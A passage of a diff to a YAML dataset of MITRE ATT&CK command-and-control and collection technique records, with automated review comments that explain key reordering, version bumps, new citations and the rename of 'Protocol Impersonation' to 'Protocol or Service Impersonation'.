Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -37248,8 +37717,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1568:
technique:
@@ -37287,7 +37754,7 @@ command-and-control:
url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:26:23.782Z'
name: Dynamic Resolution
description: |-
Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -37315,42 +37782,22 @@ command-and-control:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1102:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Anastasios Pingios
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
- type: attack-pattern
- created: '2017-05-31T21:31:13.915Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1102
- url: https://attack.mitre.org/techniques/T1102
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-07T17:53:54.380Z'
name: Web Service
description: |-
- Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+ Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Sarathkumar Rajendran, Microsoft Defender365
+ x_mitre_deprecated: false
x_mitre_detection: 'Host data that can relate unknown or suspicious process
activity using a network connection is important to supplement any existing
indicators of compromise based on malware command and control signatures and
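Review bot: this hunk is mostly key reordering rather than content: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted here and re-emitted after the data sources in the next hunk. That buries the three real changes for T1102: the new sentence and `(Citation: Broadcom BirdyClient Microsoft Graph API 2024)` in the description, the added contributor `Sarathkumar Rajendran, Microsoft Defender365`, and the new `x_mitre_deprecated: false`. Emitting keys in a fixed order in the generator (a sorted or explicitly ordered dump) would make future upstream refreshes diff as content changes only.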
@@ -37359,17 +37806,39 @@ command-and-control:
for uncommon data flows (e.g., a client sending significantly more data than
it receives from a server). User behavior monitoring may help to detect abnormal
patterns of activity.(Citation: University of Birmingham C2)'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+ created: '2017-05-31T21:31:13.915Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1102
+ external_id: T1102
+ - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+ description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+ Graph API for C&C communication. Retrieved July 1, 2024.
+ url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1568.003:
technique:
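Review bot: `x_mitre_permissions_required: - User` is dropped from T1102 with no replacement, while the same field survives as context for T1568, T1205.001, T1102.003, T1102.002, T1132.002 and T1102.001 elsewhere in this patch. Confirm the upstream object no longer carries it rather than the field being lost in the merge. If it is an upstream removal, the `x_mitre_version` bump from '1.1' to '1.2', the new `revoked: false`, and the added Broadcom reference are consistent with a refreshed object, and the only other difference in the re-emitted references is the `url` / `external_id` order, which is harmless.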
@@ -37401,7 +37870,7 @@ command-and-control:
description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
Operations. Retrieved March 6, 2017.
url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T20:54:28.287Z'
name: DNS Calculation
description: |-
Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -37418,8 +37887,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1104:
technique:
@@ -37439,7 +37906,7 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1104
external_id: T1104
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:43:38.181Z'
name: Multi-Stage Channels
description: |-
Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -37462,8 +37929,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1205.001:
technique:
@@ -37488,7 +37953,7 @@ command-and-control:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -37513,8 +37978,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.002:
technique:
@@ -37579,7 +38042,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1102.003:
technique:
@@ -37603,7 +38065,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:26:10.109Z'
name: One-Way Communication
description: |-
Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -37628,21 +38090,36 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.003:
technique:
- modified: '2024-04-19T13:24:36.872Z'
+ modified: '2024-09-25T20:48:24.411Z'
name: 'Proxy: Multi-hop Proxy'
- description: |-
- Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
- For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
- In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
-
- Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+ description: "Adversaries may chain together multiple proxies to disguise the
+ source of malicious traffic. Typically, a defender will be able to identify
+ the last proxy traffic traversed before it enters their network; the defender
+ may or may not be able to identify any previous proxies before the last-hop
+ proxy. This technique makes identifying the original source of the malicious
+ traffic even more difficult by requiring the defender to trace malicious traffic
+ through several proxies to identify its source.\n\nFor example, adversaries
+ may construct or use onion routing networks – such as the publicly available
+ [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+ C2 traffic through a compromised population, allowing communication with any
+ device within the network.(Citation: Onion Routing) Adversaries may also use
+ operational relay box (ORB) networks composed of virtual private servers (VPS),
+ Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+ obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+ infrastructure, it is possible for an adversary to leverage multiple compromised
+ devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+ By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+ on routers, adversaries can add custom code to the affected network devices
+ that will implement onion routing between those nodes. This method is dependent
+ upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+ method allowing the adversaries to cross the protected network boundary of
+ the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+ \ Protocols such as ICMP may be used as a transport. \n\nSimilarly, adversaries
+ may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+ routing between a decentralized network of peers.(Citation: NGLite Trojan)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
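Review bot: the description switches from a literal block scalar (`|-`) to a double-quoted scalar with `\n\n` escapes, so the whole paragraph is rewritten although the only content change is the added sentence on operational relay box (ORB) networks and its `(Citation: ORB Mandiant)`. The quoted form also exposes whitespace carried from upstream: a trailing space after `(Citation: ORB Mandiant) `, the `\ ` escape before `Protocols such as ICMP` (a leading space in that line) and a trailing space after `transport.`. The YAML is semantically equivalent, but forcing block style for multi-line strings in the dumper would keep this diff to the sentence that actually changed.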
@@ -37661,7 +38138,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.1'
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -37675,6 +38152,11 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1090/003
external_id: T1090.003
+ - source_name: ORB Mandiant
+ description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+ Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+ July 8, 2024.
+ url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
- source_name: NGLite Trojan
description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -37688,12 +38170,11 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.003
atomic_tests: []
T1001:
technique:
- modified: '2024-02-02T19:04:35.389Z'
+ modified: '2024-10-07T15:07:47.232Z'
name: Data Obfuscation
description: 'Adversaries may obfuscate command and control traffic to make
it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -37743,11 +38224,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1571:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:37:57.868Z'
name: Non-Standard Port
description: |-
Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -37756,20 +38236,20 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze packet contents to detect communications that do
not follow the expected protocol behavior for the port that is being used.
Analyze network data for uncommon data flows (e.g., a client sending significantly
more data than it receives from a server). Processes utilizing the network
that do not normally have network communication or have never been seen before
are suspicious.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
@@ -37794,17 +38274,16 @@ command-and-control:
url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
- source_name: Fortinet Agent Tesla April 2018
description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
Variant. Retrieved November 5, 2018.
url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1571
atomic_tests: []
T1573:
@@ -37860,7 +38339,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1573
atomic_tests: []
T1102.002:
@@ -37885,7 +38363,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:15:47.861Z'
name: Bidirectional Communication
description: "Adversaries may use an existing, legitimate external Web service
as a means for sending commands to and receiving output from a compromised
@@ -37922,8 +38400,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1573.002:
technique:
@@ -37977,7 +38453,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1095:
technique:
@@ -38049,33 +38524,12 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1095
atomic_tests: []
T1001.003:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
- type: attack-pattern
- created: '2020-03-15T00:40:27.503Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1001.003
- url: https://attack.mitre.org/techniques/T1001/003
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
- name: Protocol Impersonation
+ modified: '2024-10-09T15:40:19.436Z'
+ name: Protocol or Service Impersonation
description: "Adversaries may impersonate legitimate protocols or web service
traffic to disguise command and control activity and thwart analysis efforts.
By impersonating legitimate protocols or web services, adversaries can make
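Review bot: the rename from 'Protocol Impersonation' to 'Protocol or Service Impersonation' is a user-visible name change for T1001.003; anything else generated from this file that carries technique names (index CSVs, per-technique markdown, matrix pages) should be regenerated in the same change, and the T1572 description link text earlier in this patch already reflects it. The remainder of the hunk is the same top-to-bottom key migration seen for T1102 (`x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref`, `external_references` removed here and re-added after the data sources below), so the substantive lines are the new `modified` and `name` only.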
@@ -38083,23 +38537,61 @@ command-and-control:
\ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
like subsequent traffic is SSL/TLS encrypted, potentially interfering with
some security tooling, or to make the traffic look like it is related with
- a trusted entity. "
+ a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+ impersonate expected web traffic or trusted services. For example, adversaries
+ may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+ data to disguise C2 communications or mimic legitimate services such as Gmail,
+ Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+ Malleable-C2-U42)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - James Emery-Callcott, Emerging Threats Team, Proofpoint
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+ created: '2020-03-15T00:40:27.503Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1001/003
+ external_id: T1001.003
+ - source_name: Malleable-C2-U42
+ description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+ Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+ How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+ September 24, 2024.'
+ url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ - source_name: ESET Okrum July 2019
+ description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+ RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1090.004:
technique:
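Review bot: `x_mitre_version` moves from '1.0' to '2.0' in step with the rename, and both new citations (`Malleable-C2-U42`, `ESET Okrum July 2019`) are referenced from the description text added in the same hunk, so text and references stay consistent. One defect to be aware of: the Malleable-C2-U42 description runs seven author names together with no separators ('Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia Siddhart Shibiraj'). That string is copied verbatim from the upstream reference, so correcting it in this file would be overwritten by the next regeneration; if it matters, it belongs in an upstream fix.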
@@ -38146,7 +38638,6 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1132:
technique:
@@ -38206,7 +38697,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.002:
technique:
@@ -38238,7 +38728,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-14T23:39:50.117Z'
name: Non-Standard Encoding
description: 'Adversaries may encode data with a non-standard data encoding
system to make the content of command and control traffic more difficult to
@@ -38264,8 +38754,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.001:
technique:
@@ -38332,7 +38820,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.001
atomic_tests: []
T1105:
@@ -38430,7 +38917,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1105
atomic_tests: []
T1665:
@@ -38523,7 +39009,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1001.002:
technique:
@@ -38547,7 +39032,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-15T00:37:58.963Z'
name: Data Obfuscation via Steganography
description: 'Adversaries may use steganographic techniques to hide command
and control traffic to make detection efforts more difficult. Steganographic
@@ -38570,8 +39055,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1001.002
atomic_tests: []
T1008:
@@ -38596,7 +39079,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:49:47.340Z'
name: Fallback Channels
description: Adversaries may use fallback or alternate communication channels
if the primary channel is compromised or inaccessible in order to maintain
@@ -38616,8 +39099,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.001:
technique:
@@ -38671,7 +39152,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.001
atomic_tests: []
T1102.001:
@@ -38696,7 +39176,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:12:30.499Z'
name: Dead Drop Resolver
description: |-
Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -38722,8 +39202,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1001.001:
technique:
@@ -38777,7 +39255,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
collection:
T1560.001:
@@ -38853,7 +39330,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560.001
atomic_tests: []
T1113:
@@ -38910,7 +39386,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1113
atomic_tests: []
T1557:
@@ -39004,7 +39479,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.001:
technique:
